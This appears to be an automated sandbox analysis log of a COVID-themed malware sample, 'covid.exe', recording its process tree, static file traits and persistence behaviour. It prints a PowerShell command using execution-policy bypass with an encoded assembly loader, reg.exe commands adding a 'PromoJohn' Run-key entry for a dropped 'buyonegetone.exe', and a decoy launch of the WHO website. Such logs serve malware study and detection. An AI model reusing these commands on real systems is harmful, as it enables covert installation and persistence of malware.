    Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.who.int/
    Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4168 CREDAT:17410 /prefetch:2
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\buyonegetone.exe 'C:\Users\user\AppData\Roaming\buyonegetone.exe'
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
    Source: C:\Windows\System32\mobsync.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6888 -s 640
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\buyonegetone.exe 'C:\Users\user\AppData\Roaming\buyonegetone.exe'
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
    Source: C:\Windows\System32\mobsync.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6224 -s 636
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\buyonegetone.exe 'C:\Users\user\AppData\Roaming\buyonegetone.exe'
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
    Source: C:\Windows\System32\mobsync.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5504 -s 404
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\buyonegetone.exe 'C:\Users\user\AppData\Roaming\buyonegetone.exe'
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
    Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0AJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.who.int/Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /fJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /fJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\buyonegetone.exe 'C:\Users\user\AppData\Roaming\buyonegetone.exe' Jump to behavior
    Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4168 CREDAT:17410 /prefetch:2Jump to behavior
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeProcess created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
    Source: C:\Users\user\Desktop\covid.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: covid.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: covid.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: covid.exeStatic file information: File size 5253560 > 1048576
    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
    Source: covid.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x4ff600
    Source: covid.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

    Data Obfuscation:

    barindex
    Yara detected Powershell Load Encrypted AssemblyShow sources
    Source: Yara matchFile source: C:\Users\user\Documents\20210401\PowerShell_transcript.131521.mteVmlsc.20210401080426.txt, type: DROPPED
    Source: buyonegetone.exe.1.drStatic PE information: section name: _RDATA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFAEEB176DB push ebx; retf 1_2_00007FFAEEB1771A
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 13_2_00007FF6860870E8 push rcx; ret 13_2_00007FF6860870E9
    Source: C:\Windows\System32\mobsync.exeCode function: 15_2_0000023A00BA01C9 push esp; iretd 15_2_0000023A00BA01F8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 18_2_00007FF6FE1470E8 push rcx; ret 18_2_00007FF6FE1470E9
    Source: C:\Windows\System32\mobsync.exeCode function: 20_2_0000023F814901EC push esp; iretd 20_2_0000023F814901F8
    Source: C:\Users\user\AppData\Roaming\buyonegetone.exeCode function: 29_2_00007FF7E3DA70E8 push rcx; ret 29_2_00007FF7E3DA70E9

    Persistence and Installation Behavior:

    barindex
    Uses cmd line tools excessively to alter registry or file dataShow sources
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exeJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\buyonegetone.exeJump to dropped file
    Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PromoJohn
    Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PromoJohn
    Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run PromoJohn
    Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run PromoJohn
    Source: C:\Users\user\Desktop\covid.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
